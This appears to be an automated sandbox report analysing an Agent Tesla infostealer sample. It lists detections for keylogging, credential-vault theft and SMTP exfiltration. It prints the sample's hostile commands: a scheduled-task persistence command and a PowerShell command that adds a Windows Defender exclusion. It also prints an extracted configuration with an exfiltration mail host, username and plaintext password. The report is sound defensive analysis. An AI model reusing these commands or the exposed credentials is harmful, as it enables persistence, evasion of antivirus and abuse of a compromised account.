Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ParentImage: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ParentProcessId: 7360, ParentProcessName: jYRIGnZlROed.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp, ProcessId: 7584, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, ProcessId: 6812, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ProcessId: 984, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, ProcessId: 6812, ProcessName: schtasks.exe

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/25/24-21:27:00.324583
SID:	2851779
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/25/24-21:27:00.324583
SID:	2855542
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Exfil via SMTP - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/25/24-21:27:00.324583
SID:	2855245
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/25/24-21:27:00.324583
SID:	2840032
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/25/24-21:27:00.324334
SID:	2030171
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Virustotal: Detection: 41%			Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	ReversingLabs: Detection: 28%
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Virustotal: Detection: 41%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49739 -> 50.87.139.143:587

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 50.87.139.143:587

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 50.87.139.143 50.87.139.143

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 50.87.139.143:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 23.61.11.39
Source: unknown	TCP traffic detected without corresponding DNS query: 23.61.11.8
Source: unknown	TCP traffic detected without corresponding DNS query: 23.61.11.39
Source: unknown	TCP traffic detected without corresponding DNS query: 23.61.11.8
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: MSBuild.exe, 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.elec-qatar.com
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1662329813.0000000003068000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1695168637.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, K6jmfEUYzg.cs

.Net Code: aft6g33EiG

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119B0BC NtQueryInformationProcess,		0_2_0119B0BC
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517B0BC NtQueryInformationProcess,		9_2_0517B0BC

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119C090	0_2_0119C090
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01192BC0	0_2_01192BC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119BAF0	0_2_0119BAF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01194518	0_2_01194518
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196D08	0_2_01196D08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011935B0	0_2_011935B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01192440	0_2_01192440
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119B4A8	0_2_0119B4A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01199F88	0_2_01199F88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01194905	0_2_01194905
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196000	0_2_01196000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01193050	0_2_01193050
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01191850	0_2_01191850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197850	0_2_01197850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01194857	0_2_01194857
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119784E	0_2_0119784E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01193060	0_2_01193060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01191860	0_2_01191860
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196890	0_2_01196890
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196880	0_2_01196880
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196B08	0_2_01196B08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011923BC	0_2_011923BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01192BB0	0_2_01192BB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119A218	0_2_0119A218
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119A208	0_2_0119A208
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119A2F9	0_2_0119A2F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196AF8	0_2_01196AF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011935A0	0_2_011935A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01192430	0_2_01192430
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011944C9	0_2_011944C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196CF9	0_2_01196CF9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01199F77	0_2_01199F77
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011947C8	0_2_011947C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01195FF0	0_2_01195FF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196658	0_2_01196658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01196652	0_2_01196652
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011946A3	0_2_011946A3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119F6E8	0_2_0119F6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0120E38D	8_2_0120E38D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01204A98	8_2_01204A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01203E80	8_2_01203E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_012041C8	8_2_012041C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0120A960	8_2_0120A960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E65F0	8_2_065E65F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E55A8	8_2_065E55A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065EB240	8_2_065EB240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E3058	8_2_065E3058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E7D98	8_2_065E7D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E76A0	8_2_065E76A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E2340	8_2_065E2340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065EE3B0	8_2_065EE3B0
